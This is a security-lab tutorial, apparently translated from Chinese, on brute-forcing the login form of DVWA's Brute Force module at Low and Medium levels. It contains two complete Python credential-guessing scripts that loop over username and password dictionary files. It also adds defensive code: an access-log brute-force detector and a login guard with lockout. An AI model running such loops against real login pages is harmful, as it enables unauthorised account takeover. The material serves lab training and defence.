The test target is DVWA; this applies to the Low and Medium levels of DVWA's Brute Force module.
Key code explained. url specifies the target URL:
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"  # requests needs the scheme in the URL
header sets the request headers:
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'cookie': 'security=medium; PHPSESS=geo7gb3ehf5gfnbhrvuqu545i7'
}
payload sets the request parameters:
payload = {'username': username, 'password': password, "Login": 'Login'}
This line makes a single GET request; the response is received in the variable Response.
Response = requests.get(url, params=payload, headers=header)
These two lines loop over the username and password dictionary files and then brute force every combination of the two (their Cartesian product).
This is the same as the Cluster bomb attack type in Burp's Intruder module.
for admin in open("C:\\Users\\admin\\documents\\字典\\賬號.txt"):
    for line in open("C:\\Users\\admin\\documents\\字典\\密碼.txt"):
然后把循環(huán)結(jié)果存放到csv文件里,用逗號分割數(shù)據(jù)
Response.status_code is the HTTP status code of the response; len(Response.content) is the length of the HTTP response body.
result = str(Response.status_code) + ',' + username + ',' \
    + password + ',' + str(len(Response.content))
f.write(result + '\n')
Full code, method one
A successful login returns different data from a failed one, so the response length differs as well. The entry whose length differs from all the others is probably the correct username and password.
import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"  # requests needs the scheme in the URL
# proxies = {"http": "127.0.0.1:8080"}  # proxy setting, handy for capturing the traffic in Burp
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'cookie': 'security=medium; PHPSESS=bdi0ak5mqbud69nrnejgf8q00u'
}
f = open('result.csv', 'w')
f.write('狀態碼' + ',' + '用戶名' + ',' + '密碼' + ',' + '包長度' + '\n')
for admin in open("C:\\Users\\admin\\documents\\字典\\賬號.txt"):
    for line in open("C:\\Users\\admin\\documents\\字典\\密碼.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username': username, 'password': password, "Login": 'Login'}
        Response = requests.get(url, params=payload, headers=header)
        # one CSV row per attempt: status code, username, password, response length
        result = str(Response.status_code) + ',' + username + ',' \
            + password + ',' + str(len(Response.content))
        f.write(result + '\n')
f.close()
print('\n完成')
Run it
This is the request the script sends.
Check the results
Find the row whose response length differs from the others and test it by logging in.
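Seen from the server side, the same two signals the script relies on (a burst of requests to one login URL and a single response whose size differs from the rest) are what a defender looks for in the web server's access log. The following is an added example, not part of the original post: it parses constructed Apache combined-format log lines modelled on the traffic method one produces, flags any client that sends more than a threshold of login requests inside a time window, and reports the odd-sized response together with the username it carried. The login path, threshold and window are assumptions chosen for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Assumed login endpoint; it matches the URL used by the script on this page.
LOGIN_PATH = "/dvwa/vulnerabilities/brute/"

# Apache combined log format: ip ident user [ts] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log: one client hammering the login page (five responses of one
# size, one of a different size) plus one unrelated request from another client.
SAMPLE_LOG = """\
192.168.171.10 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess1&Login=Login HTTP/1.1" 200 4612 "-" "Mozilla/5.0"
192.168.171.10 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess2&Login=Login HTTP/1.1" 200 4612 "-" "Mozilla/5.0"
192.168.171.10 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess3&Login=Login HTTP/1.1" 200 4612 "-" "Mozilla/5.0"
192.168.171.10 - - [10/Oct/2023:13:55:37 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess4&Login=Login HTTP/1.1" 200 4612 "-" "Mozilla/5.0"
192.168.171.10 - - [10/Oct/2023:13:55:37 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess5&Login=Login HTTP/1.1" 200 4708 "-" "Mozilla/5.0"
192.168.171.10 - - [10/Oct/2023:13:55:38 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess6&Login=Login HTTP/1.1" 200 4612 "-" "Mozilla/5.0"
192.168.171.50 - - [10/Oct/2023:13:55:40 +0000] "GET /dvwa/index.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def username_of(path):
    """Extract the username query parameter (the form submits credentials via GET)."""
    return parse_qs(urlsplit(path).query).get("username", [""])[0]


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Map each client IP that made >= threshold login requests within any
    window_seconds span to a report naming the responses whose size deviates
    from that client's most common response size."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and urlsplit(rec["path"]).path == LOGIN_PATH:
            per_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        # Sliding window: largest number of login requests inside window_seconds.
        start, peak = 0, 0
        for end in range(len(recs)):
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        common_size = Counter(r["size"] for r in recs).most_common(1)[0][0]
        outliers = [(username_of(r["path"]), r["size"]) for r in recs if r["size"] != common_size]
        alerts[ip] = {
            "requests": len(recs),
            "peak_in_window": peak,
            "common_size": common_size,
            "outliers": outliers,  # likely successful guesses: investigate these accounts
        }
    return alerts


if __name__ == "__main__":
    for ip, report in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, report)
```

Two things the log makes visible beyond the count itself: because the form submits credentials with GET, every guessed password lands in the access log in clear text, so the log itself must be protected; and the single different-sized response tells the responder which account to treat as compromised.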
Method two. This method decides whether a username and password are correct from a characteristic of the successful login response, then prints the correct credentials to the screen and to a txt file.
The main changes are in lines 17 to 20.
import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"  # requests needs the scheme in the URL
# proxies = {"http": "127.0.0.1:8080"}  # proxy setting, handy for capturing the traffic in Burp
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'cookie': 'security=medium; PHPSESS=bdi0ak5mqbud69nrnejgf8q00u'
}
f = open('result.txt', 'w')
for admin in open("C:\\Users\\admin\\documents\\字典\\賬號.txt"):
    for line in open("C:\\Users\\admin\\documents\\字典\\密碼.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username': username, 'password': password, "Login": 'Login'}
        Response = requests.get(url, params=payload, headers=header)
        # a successful login is recognised by this string in the response body
        if 'Welcome to the password protected area' in Response.text:
            result = username + ':' + password
            print(result)
            f.write(result + '\n')
f.close()
print('\n完成')
Run it
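Both methods work only because the Low and Medium levels accept an unlimited number of attempts and answer each one immediately. The added example below, which is not DVWA's code or the post's own, shows the standard countermeasure as a small Python login guard: passwords are kept as salted PBKDF2 hashes, consecutive failures are counted per account, and the account is temporarily locked once the limit is reached, so that the Cartesian-product loop above stops producing information after a handful of requests. The limit of 3 failures, the 15-minute lockout, the PBKDF2 round count and the injectable clock are assumptions made for the example.

```python
import hashlib
import hmac
import os
import time

# Policy values assumed for this example; tune them for a real deployment.
MAX_FAILURES = 3
LOCKOUT_SECONDS = 15 * 60
PBKDF2_ROUNDS = 20_000  # kept low so the example runs quickly


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256; only the result is stored, never the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class LoginGuard:
    """Login check with per-account failure counting and temporary lockout."""

    def __init__(self, plaintext_credentials, clock=time.time):
        # Plaintext is accepted here only to build the demo user table.
        self._users = {}
        for user, pw in plaintext_credentials.items():
            salt = os.urandom(16)
            self._users[user] = (salt, hash_password(pw, salt))
        self._failures = {}      # username -> consecutive failed attempts
        self._locked_until = {}  # username -> unix time at which the lock expires
        self._clock = clock      # injectable so tests can advance time
        # Dummy entry so unknown usernames cost the same hashing work as real ones
        # (no timing difference that would reveal which accounts exist).
        self._dummy_salt = os.urandom(16)
        self._dummy_hash = hash_password("", self._dummy_salt)

    def attempt(self, username, password):
        """Return "ok", "fail" or "locked" for one login attempt."""
        now = self._clock()
        if now < self._locked_until.get(username, 0):
            return "locked"  # rejected before the password is even checked
        salt, expected = self._users.get(username, (self._dummy_salt, self._dummy_hash))
        ok = hmac.compare_digest(hash_password(password, salt), expected)
        ok = ok and username in self._users  # the dummy hash can never authenticate
        if ok:
            self._failures[username] = 0
            return "ok"
        count = self._failures.get(username, 0) + 1
        if count >= MAX_FAILURES:
            self._locked_until[username] = now + LOCKOUT_SECONDS
            self._failures[username] = 0
            return "locked"
        self._failures[username] = count
        return "fail"


def demo():
    """Replay a short guessing sequence against a fake clock and return the outcomes."""
    clock = [1_700_000_000.0]
    guard = LoginGuard({"admin": "correct horse battery"}, clock=lambda: clock[0])
    outcomes = [guard.attempt("admin", guess) for guess in ("guess1", "guess2", "guess3")]
    outcomes.append(guard.attempt("admin", "correct horse battery"))  # right password, still locked
    clock[0] += LOCKOUT_SECONDS + 1
    outcomes.append(guard.attempt("admin", "correct horse battery"))  # lock expired
    return outcomes


if __name__ == "__main__":
    print(demo())
```

The lockout is keyed by account, which means a third party who knows a username can keep it locked on purpose; deployments usually pair the account counter with a per-source rate limit or a progressive delay rather than relying on lockout alone.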